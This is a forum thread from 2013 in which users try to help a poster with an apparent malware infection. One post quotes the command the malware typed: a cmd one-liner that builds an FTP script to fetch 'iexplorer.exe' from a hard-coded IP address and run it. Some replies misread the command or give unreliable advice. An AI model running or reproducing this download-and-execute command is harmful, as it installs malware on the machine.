Author Topic: Uhm, virus? Help? (Read 9152 times)

Blockzillahead · February 03, 2013, 04:17:54 PM

Quote from: Evar678 on February 03, 2013, 04:14:26 PM

[im g]https://dl.dropbox.com/u/30951213/Pictures/Other/threats.png[/img]
Hmm.
(If the image is broken just wait, I'm syncing alot of stuff with dropbox just incase I need to system restore)

Quote from: Blockzillahead on February 03, 2013, 02:37:51 PM

Code: [Select]
C:\Users\Evar678\AppData\Local\Akamai\netsession_win.exe C:\Users\Evar678\AppData\Local\Akamai\netsession_win.exe C:\Users\Evar678\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
Those look suspicious to me.

Relevant to above.

Ad Bot · Advertisement

Greek2me · February 03, 2013, 04:18:01 PM

Quote from: Evar678 on February 03, 2013, 04:06:54 PM

Here, I filtered out the log file for you.

It says it can't find Microsoft-Windows-Security-SPP-Client and Microsoft-Windows-Security-SPP-UX, whatever those are.

edit: I guess that is Software Protection Platform Service, which still doesn't help much.

Blocklandian¹ · February 03, 2013, 04:19:30 PM

Quote from: Evar678 on February 03, 2013, 04:14:26 PM

Hmm.
(If the image is broken just wait, I'm syncing alot of stuff with dropbox just incase I need to system restore)

Did it create any logs to examine?

Currently, We can skip the detected threat at the moment.

Evar678 · February 03, 2013, 04:21:54 PM

Quote from: Blocklandian¹ on February 03, 2013, 04:19:30 PM

Did it create any logs to examine?

Currently, We can skip the detected threat at the moment.

Quarantined that file.

Full log provided here(plain text): https://dl.dropbox.com/u/30951213/Documents/Plain%20Text/TDSSKiller%20Log%202.3.13.01.txt

Doomonkey · February 03, 2013, 04:22:59 PM

Unplug the network cable and then let the virus type in the command to command prompt. See what it does.

Evar678 · February 03, 2013, 04:26:48 PM

Quote from: Doomonkey on February 03, 2013, 04:22:59 PM

Unplug the network cable and then let the virus type in the command to command prompt. See what it does.

I have no idea when the virus will type anything.
It's completely unpredictable.

I've had it happen to me during league of legends games (in the middle of a teamfight as the support. For forgets sake that was annoying.), while playing blockland, while typing into forums, etc..

Last night I left my laptop on all night with notepad up, and it only typed in the command once, and the result of that was:

Code: [Select]

start %systemroot%\system32\cmd.exe
del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

Blocklandian¹ · February 03, 2013, 04:37:27 PM

During or after the message pops up, Are you familiar with something known as "mswinsvcr.exe"?

Evar678 · February 03, 2013, 04:38:39 PM

Quote from: Blocklandian¹ on February 03, 2013, 04:37:27 PM

During or after the message pops up, Are you familiar with something known as "mswinsvcr.exe"?

No.

Blocklandian¹ · February 03, 2013, 05:03:22 PM

Actually, As Blockzillahead previously suggested, Try uninstalling tightvnc for awhile and see if you still get the problem.

cowman · February 03, 2013, 05:10:11 PM

Try this http://download.cnet.com/Security-Task-Manager/3000-2094_4-10246545.html i used to get rid of a key logger

Mr.jacksaunt · February 03, 2013, 05:13:54 PM

what'd you use to get rid of cnet's garbage downloader?

Blocklandian¹ · February 03, 2013, 05:14:32 PM

Quote from: Mr.jacksaunt on February 03, 2013, 05:13:54 PM

what'd you use to get rid of cnet's garbage downloader?

You can also use the direct download link.

Big Brøther · February 03, 2013, 05:22:01 PM

Quote from: Comatose on February 03, 2013, 12:44:44 PM

iexplorer.exe is the file used to initialize Internet Explorer.

Based on the lines of code and from what I can piece together, the malware may be attempting to delete Internet Explorer to in order to hinder your computer's performance and permanently damage the OS.

I don't know what kind of malicious software this is. Google searches have turned up nothing. If possible, try a system restore back to a point before you downloaded whatever it was.

sounds like a bloody good virus

blockzillahead, i stuck up for you in that other topic - but all you do is talk about stuff you have no idea about. you're freaking out the OP and scaring him half to death and you thought spotify web helper was a back door. jesus loving christ almighty, stop lol

Blocklandian¹ · February 03, 2013, 06:25:15 PM

Quote from: Big Brøther on February 03, 2013, 05:22:01 PM

blockzillahead, i stuck up for you in that other topic - but all you do is talk about stuff you have no idea about. you're freaking out the OP and scaring him half to death and you thought spotify web helper was a back door. jesus loving christ almighty, stop lol

Blockzillahead is actually doing a wonderful job, Although he may have some confusion, He actually is helping, Afterall, We all have at some point learned more about a subject then we originally knew.

auzman466 · February 03, 2013, 07:00:10 PM

Quote from: Blocklandian¹ on February 03, 2013, 06:25:15 PM

Blockzillahead is actually doing a wonderful job, Although he may have some confusion, He actually is helping, Afterall, We all have at some point learned more about a subject then we originally knew.

Stop spouting bullstuff.
Blockzillahead has a bad reputation as it is, and

Quote from: Big Brøther on February 03, 2013, 05:22:01 PM

[Blockzillahead] you're freaking out the OP and scaring him half to death and you thought spotify web helper was a back door. jesus loving christ almighty, stop lol